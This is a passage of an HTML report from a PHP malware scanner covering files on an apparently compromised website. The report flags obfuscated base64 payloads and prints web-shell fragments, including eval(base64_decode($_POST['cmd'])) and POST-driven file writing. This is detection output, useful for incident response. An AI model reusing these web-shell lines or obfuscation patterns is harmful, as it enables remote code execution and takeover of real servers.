</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$G</span><span style="color: #007700">(</span><span style="color: #0000BB">$oaj</span><span style="color: #007700">(</span><span style="color: #DD0000">'7X1rd9s20vD355znPzBaZyk1uviSW+3YqeMojc/asWs73ezarh5aomw2lKiQVOKkyfvbX8wFNxKU5DTpbfe0kSVgMBgAgwEwmBk83nr0eHI1+d//+S4aR70szOt+mKZJ2ouTS7/pvXi5t9fY8HSmSO4hQCZyl62sURDF7WAw6F33rsJgEKYliPB6kmRhT9TnN+eX9ZPh0K8s78hFutNwkqR5NL4s1T6IskkcvLfJX0rigcCXhfHQ2/SWesfdox+7R6f+4fND8X3vmX9OMGk4SnJB2SC1wI66+wcn3d7206dHCOkoL+BrndpGVSELHf1V6PpxkGXe8f7JofeLN5lexFHfW4KfvcODoxNRcvXehkrfOdp7BnWdpWfjmk4eJL1BeDG91ClP4WcyzSfTHODD/lViw78N04nIGQZxFuqMk2gUJlhk5Z6dGkejCNLXlnX6j2GaRclYpPr32qvtVV9kpdHbIA+9pWyUT3r9ZD...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 84abfe10 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 84abfe10)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$EjSZ</span><span style="color: #007700">.</span><span style="color: #0000BB">$cDRUH</span><span style="color: #007700">.</span><span style="color: #0000BB">$jMAMh</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$Bkor</span><span style="color: #007700">.</span><span style="color: #0000BB">$Sus</span><span style="color: #007700">.</span><span style="color: #0000BB">$CDaO</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$LGe</span><span style="color: #007700">.</span><span style="color: #0000BB">$wOxb</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_3").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/ww/installer.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 57.71 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:29</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:48:06</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 1</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_4" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Function shell_exec <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `shell_exec`</p><p><i>[<a href="https://www.php.net/shell_exec" target="_blank" class="text-primary">https://www.php.net/shell_exec</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$unzip_command</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$lib_directory&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">dirname</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">).</span><span style="color: #DD0000">'/'</span><span style="color: #007700">.</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">INSTALLER_DIR_NAME</span><span style="color: #007700">.</span><span style="color: #DD0000">'/lib'</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$snaplib_directory&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">$lib_directory</span><span style="color: #007700">.</span><span style="color: #DD0000">'/snaplib'</span><span style="color: #007700">;&nbsp;if(!</span><span style="color: #0000BB">file_exists</span><span style="color: #007700">(</span><span style="color: #0000BB">$snaplib_directory</span><span style="color: #007700">))&nbsp;{&nbsp;</span><span style="color: #0000BB">$local_lib_directory&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #0000BB">dirname</span><span style="color: #007700">(</span><span style="color: #0000BB">__FILE__</span><span style="color: #007700">).</span><span style="color: #DD0000">'/snaplib'</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">$unzip_command&nbsp;</span><span style="color: #007700">=&nbsp;</span><span style="color: #DD0000">"</span><span style="color: #0000BB">$unzip_filepath</span><span style="color: #DD0000">&nbsp;-q&nbsp;</span><span style="color: #0000BB">$archive_filepath</span><span style="color: #DD0000">&nbsp;snaplib/*&nbsp;2&gt;&amp;1"</span><span style="color: #007700">;&nbsp;</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">log</span><span style="color: #007700">(</span><span style="color: #DD0000">"Executing&nbsp;</span><span style="color: #0000BB">$unzip_command</span><span style="color: #DD0000">"</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">$stderr&nbsp;</span><span style="color: #007700">.=&nbsp;</span><span style="color: #0000BB">shell_exec</span><span style="color: #007700">(</span><span style="color: #0000BB">$unzip_command</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">self</span><span style="color: #007700">::</span><span style="color: #0000BB">mkdir</span><span style="color: #007700">(</span><span style="color: #0000BB">$lib_directory</span><span style="color: #007700">,</span><span style="color: #DD0000">'u+rwx'</span><span style="color: #007700">);&nbsp;</span><span style="color: #0000BB">rename</span><span style="color: #007700">(</span><span style="color: #0000BB">$local_lib_directory</span><span style="color: #007700">,&nbsp;</span><span style="color: #0000BB">$snaplib_directory</span><span style="color: #007700">);&nbsp;}&nbsp;if&nbsp;(</span><span style="color: #0000BB">$stderr&nbsp;</span><span style="color: #007700">==&nbsp;</span><span style="color: #DD0000">''</span><span style="color: #007700">)&nbsp;{&nbsp;...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 471b95ee <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1140</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 471b95ee)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">suhosin</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_4").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/ene.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 18.47 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:05:47</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 4</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_5" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'7X1rd9s20vD355znPzBaZyk1uviSW+3YqeMojc/asWs73ezarh5aomw2lKiQVOKkyfvbX8wFNxKU5DTpbfe0kSVgMBgAgwEwmBk83nr0eHI1+d//+S4aR70szOt+mKZJ2ouTS7/pvXi5t9fY8HSmSO4hQCZyl62sURDF7WAw6F33rsJgEKYliPB6kmRhT9TnN+eX9ZPh0K8s78hFutNwkqR5NL4s1T6IskkcvLfJX0rigcCXhfHQ2/SWesfdox+7R6f+4fND8X3vmX9OMGk4SnJB2SC1wI66+wcn3d7206dHCOkoL+BrndpGVSELHf1V6PpxkGXe8f7JofeLN5lexFHfW4KfvcODoxNRcvXehkrfOdp7BnWdpWfjmk4eJL1BeDG91ClP4WcyzSfTHODD/lViw78N04nIGQZxFuqMk2gUJlhk5Z6dGkejCNLXlnX6j2GaRclYpPr32qvtVV9kpdHbIA+9pWyUT3r9ZDw20nBQjN9XYZz...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of arrays technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$EjSZ</span><span style="color: #007700">.</span><span style="color: #0000BB">$cDRUH</span><span style="color: #007700">.</span><span style="color: #0000BB">$jMAMh</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$Bkor</span><span style="color: #007700">.</span><span style="color: #0000BB">$Sus</span><span style="color: #007700">.</span><span style="color: #0000BB">$CDaO</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$LGe</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat_vars_with_spaces <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of vars technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$CDaO</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$LGe</span><span style="color: #007700">.</span><span style="color: #0000BB">$wOxb</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$G</span><span style="color: #007700">(</span><span style="color: #0000BB">$oaj</span><span style="color: #007700">(</span><span style="color: #DD0000">'7X1rd9s20vD355znPzBaZyk1uviSW+3YqeMojc/asWs73ezarh5aomw2lKiQVOKkyfvbX8wFNxKU5DTpbfe0kSVgMBgAgwEwmBk83nr0eHI1+d//+S4aR70szOt+mKZJ2ouTS7/pvXi5t9fY8HSmSO4hQCZyl62sURDF7WAw6F33rsJgEKYliPB6kmRhT9TnN+eX9ZPh0K8s78hFutNwkqR5NL4s1T6IskkcvLfJX0rigcCXhfHQ2/SWesfdox+7R6f+4fND8X3vmX9OMGk4SnJB2SC1wI66+wcn3d7206dHCOkoL+BrndpGVSELHf1V6PpxkGXe8f7JofeLN5lexFHfW4KfvcODoxNRcvXehkrfOdp7BnWdpWfjmk4eJL1BeDG91ClP4WcyzSfTHODD/lViw78N04nIGQZxFuqMk2gUJlhk5Z6dGkejCNLXlnX6j2GaRclYpPr32qvtVV9kpdHbIA+9pWyUT3r9ZD...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 84abfe10 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 84abfe10)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$EjSZ</span><span style="color: #007700">.</span><span style="color: #0000BB">$cDRUH</span><span style="color: #007700">.</span><span style="color: #0000BB">$jMAMh</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$Bkor</span><span style="color: #007700">.</span><span style="color: #0000BB">$Sus</span><span style="color: #007700">.</span><span style="color: #0000BB">$CDaO</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span><span style="color: #0000BB">$hE</span><span style="color: #007700">.</span><span style="color: #0000BB">$LGe</span><span style="color: #007700">.</span><span style="color: #0000BB">$wOxb</span><span style="color: #007700">.</span><span style="color: #0000BB">$fkZH</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_5").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/res.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 15.13 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:02</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 4</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 1</span><br><table id="file_6" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'7X1rd9u2sujne9e6/4HRdjbJWA/LzqtybMdxnMarSZrGTk/PsVwdmqIsNpSokJTjJPb+7RczeA1IUJbdpu1e56zWigQMBgNgMBgMBoOd7Sc7s/Hs//3fp/E0HuRR4blRlqXZIEnP3Kbz5v2rV/6mozNZ8gABcpa7ZmRNgjhpB8Ph4GIwjoJhlAmIMAny3Hn78u1rBhBlzldnNj9N4tBZ2RsH2WFUOFuOG+dp6/HjB9+1uu6mzk+nRTQtjj7PIoApoouiM0uCeEpg9qdhOoynZwDw+DQuaBbQeTAdpZBH0l9k6QSSsjQtniZpGCTjNC9KAG+CCVb6jgE573PWGp1/GE1Z80pY30XFPJu+DYpxKeNwfvpbFBal1Gfp8HMpaTcpaGqWFqxYNHRWXh+83q/PeYmdXc2D8TDzRD3/kWbD/8iCGUte06lidBgoFCy1FpIgqzPPs05+Gk87uUglgKyXJOyPsyJOpzkrUmTzSIO8TeZn8fR5XCa...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of arrays technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$cH</span><span style="color: #007700">.</span><span style="color: #0000BB">$ZnUq</span><span style="color: #007700">.</span><span style="color: #0000BB">$GqX</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$ePpE</span><span style="color: #007700">.</span><span style="color: #0000BB">$P</span><span style="color: #007700">.</span><span style="color: #0000BB">$XHXyA</span><span style="color: #007700">.</span><span style="color: #0000BB">$bw</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$mpy</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit concat_vars_with_spaces <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Concatenation of vars technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$GBPBD</span><span style="color: #007700">.</span><span style="color: #0000BB">$gu</span><span style="color: #007700">.</span><span style="color: #0000BB">$XE</span><span style="color: #007700">.</span><span style="color: #0000BB">$iO</span><span style="color: #007700">.</span><span style="color: #0000BB">$pPdi</span><span style="color: #007700">.</span><span style="color: #0000BB">$emqDZ</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">$gQ</span><span style="color: #007700">(</span><span style="color: #0000BB">$ZiwpR</span><span style="color: #007700">(</span><span style="color: #DD0000">'7X1rd9u2sujne9e6/4HRdjbJWA/LzqtybMdxnMarSZrGTk/PsVwdmqIsNpSokJTjJPb+7RczeA1IUJbdpu1e56zWigQMBgNgMBgMBoOd7Sc7s/Hs//3fp/E0HuRR4blRlqXZIEnP3Kbz5v2rV/6mozNZ8gABcpa7ZmRNgjhpB8Ph4GIwjoJhlAmIMAny3Hn78u1rBhBlzldnNj9N4tBZ2RsH2WFUOFuOG+dp6/HjB9+1uu6mzk+nRTQtjj7PIoApoouiM0uCeEpg9qdhOoynZwDw+DQuaBbQeTAdpZBH0l9k6QSSsjQtniZpGCTjNC9KAG+CCVb6jgE573PWGp1/GE1Z80pY30XFPJu+DYpxKeNwfvpbFBal1Gfp8HMpaTcpaGqWFqxYNHRWXh+83q/PeYmdXc2D8TDzRD3/kWbD/8iCGUte06lidBgoFCy1FpIgqzPPs05+Gk87uUglgKyXJOyPsyJOpzkrUmT...</span>
</span>
</code></code></td></tr><tr><td><p><b>Sign 84abfe10 <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Malware Signature (hash: 84abfe10)</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">$cH</span><span style="color: #007700">.</span><span style="color: #0000BB">$ZnUq</span><span style="color: #007700">.</span><span style="color: #0000BB">$GqX</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$ePpE</span><span style="color: #007700">.</span><span style="color: #0000BB">$P</span><span style="color: #007700">.</span><span style="color: #0000BB">$XHXyA</span><span style="color: #007700">.</span><span style="color: #0000BB">$bw</span><span style="color: #007700">.</span><span style="color: #0000BB">$wGK</span><span style="color: #007700">.</span><span style="color: #0000BB">$mpy</span><span style="color: #007700">.</span><span style="color: #0000BB">$nom</span><span style="color: #007700">.</span><span style="color: #0000BB">$bw</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr></tbody></table><script type="text/javascript">$("#file_6").DataTable();</script></td></tr><tr><td><p><i class="fas fa-file text-primary mr-2"></i> /var/www/likoholding/liko-holding.com.ua/folder/wp_inrets.php</p><span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Size: 17.39 kB</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Created: 2019-09-27 21:06:29</span> <span class="badge badge-pill badge-fileinfo py-2 px-3 mr-1 shadow-none">Modified: 2023-07-31 18:47:26</span> <span class="badge badge-pill badge-warning py-2 px-3 mr-1 shadow-none">Warns: 3</span> <span class="badge badge-pill badge-danger py-2 px-3 mr-1 shadow-none">Dangers: 4</span><br><table id="file_7" class="table container table-sm table-striped table-borderless"><thead  ><tr><th>Description</th><th>Match</th></tr></thead><tbody><tr><td><p><b>Exploit base64_long <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Long Base64 encoded text is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #DD0000">'eNrtfQt32zjO6F/RaN3KmtqxnfQ1dpU2k7rTnE2aTOLOzm6S9afYcqKtbLmS3KZNc3/7BcC3HrHTx7x2z5lMLRIESRAkQRAAn4WzcJgGWd0JkiROhlF87jRevd7ddXvPZBYkDik7dRptPWPqh9GaPx4PL4cXgT8Oklx+cDmP02A4v5gvL+jEk4lTVbiYSa1NgnmcZOHsPId+HKbzyP+gN7oWR2NAlQbRxKsNj/qHv/QPj52Dlwfwe/eFc0oASTCNM2jPONFgDvt7+4P+cOv580MEKynr2S27V1FAQ8T+FYhGkZ+m1tHe4OBqvjiLwpFVw4/hwf7hwFt/0BOJ24e7Lzz7JDmZ2TJtHA/HwdniXCY8x694kc0XmWcHo4vYgH0XJHNv4kdpIFMH4TQAeK/zwEiKwmmYeRttmfhLkKRhPPOcB2vra+tOb56E7/wssGrpNJsPR/FsppKI2urzIojiYTKPPsikyWI2ygCbFVDr67U0S9yrcFK...</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit eval_base64 <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'cmd'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'body'</span><span style="color: #007700">])</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit execution <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP</p><p><i>[<a href="https://cwe.mitre.org/data/definitions/77.html" target="_blank" class="text-primary">https://cwe.mitre.org/data/definitions/77.html</a>, <a href=" https://cwe.mitre.org/data/definitions/78.html" target="_blank" class="text-primary"> https://cwe.mitre.org/data/definitions/78.html</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'eNrtfQt32zjO6F/RaN3KmtqxnfQ1dpU2k7rTnE2aTOLOzm6S9afYcqKtbLmS3KZNc3/7BcC3HrHTx7x2z5lMLRIESRAkQRAAn4WzcJgGWd0JkiROhlF87jRevd7ddXvPZBYkDik7dRptPWPqh9GaPx4PL4cXgT8Oklx+cDmP02A4v5gvL+jEk4lTVbiYSa1NgnmcZOHsPId+HKbzyP+gN7oWR2NAlQbRxKsNj/qHv/QPj52Dlwfwe/eFc0oASTCNM2jPONFgDvt7+4P+cOv580MEKynr2S27V1FAQ8T+FYhGkZ+m1tHe4OBqvjiLwpFVw4/hwf7hwFt/0BOJ24e7Lzz7JDmZ2TJtHA/HwdniXCY8x694kc0XmWcHo4vYgH0XJHNv4kdpIFMH4TQAeK/zwEiKwmmYeRttmfhLkKRhPPOcB2vra+tOb56E7/wssGrpNJsPR/FsppKI2urzIoj...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1</span> <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">gzuncompress</span><span style="color: #007700">(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #DD0000">'eNrtfQt32zjO6F/RaN3KmtqxnfQ1dpU2k7rTnE2aTOLOzm6S9afYcqKtbLmS3KZNc3/7BcC3HrHTx7x2z5lMLRIESRAkQRAAn4WzcJgGWd0JkiROhlF87jRevd7ddXvPZBYkDik7dRptPWPqh9GaPx4PL4cXgT8Oklx+cDmP02A4v5gvL+jEk4lTVbiYSa1NgnmcZOHsPId+HKbzyP+gN7oWR2NAlQbRxKsNj/qHv/QPj52Dlwfwe/eFc0oASTCNM2jPONFgDvt7+4P+cOv580MEKynr2S27V1FAQ8T+FYhGkZ+m1tHe4OBqvjiLwpFVw4/hwf7hwFt/0BOJ24e7Lzz7JDmZ2TJtHA/HwdniXCY8x694kc0XmWcHo4vYgH0XJHNv4kdpIFMH4TQAeK/zwEiKwmmYeRttmfhLkKRhPPOcB2vra+tOb56E7/wssGrpNJsPR/FsppKI2urzIoj...</span>
</span>
</code></code></td></tr><tr><td><p><b>Function eval <span class="badge badge-pill badge-warning py-1 px-2 ml-1 shadow-none">Warning</span></b></p><p>Potentially dangerous function `eval`</p><p><i>[<a href="https://www.php.net/eval" target="_blank" class="text-primary">https://www.php.net/eval</a>]</i></p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">eval(</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'cmd'</span><span style="color: #007700">]));exit;}if(!empty(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'file'</span><span style="color: #007700">])){</span><span style="color: #0000BB">$path</span><span style="color: #007700">=</span><span style="color: #0000BB">dirname</span><span style="color: #007700">(</span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'SCRIPT_FILENAME'</span><span style="color: #007700">]);if(!empty(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'root'</span><span style="color: #007700">])&amp;&amp;&nbsp;</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'root'</span><span style="color: #007700">]==&nbsp;</span><span style="color: #DD0000">'http_root'</span><span style="color: #007700">){</span><span style="color: #0000BB">$path</span><span style="color: #007700">=</span><span style="color: #0000BB">$_SERVER</span><span style="color: #007700">[</span><span style="color: #DD0000">'DOCUMENT_ROOT'</span><span style="color: #007700">];}</span><span style="color: #0000BB">$path&nbsp;</span><span style="color: #007700">.=&nbsp;</span><span style="color: #DD0000">'/'</span><span style="color: #007700">;if(!empty(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'dir'</span><span style="color: #007700">])){</span><span style="color: #0000BB">$path&nbsp;</span><span style="color: #007700">.=&nbsp;</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'dir'</span><span style="color: #007700">];}if(!empty(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'filename'</span><span style="color: #007700">])){</span><span style="color: #0000BB">mkdir</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">,</span><span style="color: #0000BB">0777</span><span style="color: #007700">,</span><span style="color: #0000BB">1</span><span style="color: #007700">);</span><span style="color: #0000BB">file_put_contents</span><span style="color: #007700">(</span><span style="color: #0000BB">$path&nbsp;</span><span style="color: #007700">.</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'filename'</span><span style="color: #007700">],</span><span style="color: #0000BB">base64_decode</span><span style="color: #007700">(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'file'</span><span style="color: #007700">]));}exit;}if(empty(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'subject'</span><span style="color: #007700">])||&nbsp;empty(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: #DD0000">'body'</span><span style="color: #007700">])||&nbsp;empty(</span><span style="color: #0000BB">$_POST</span><span style="color: #007700">[</span><span style="color: 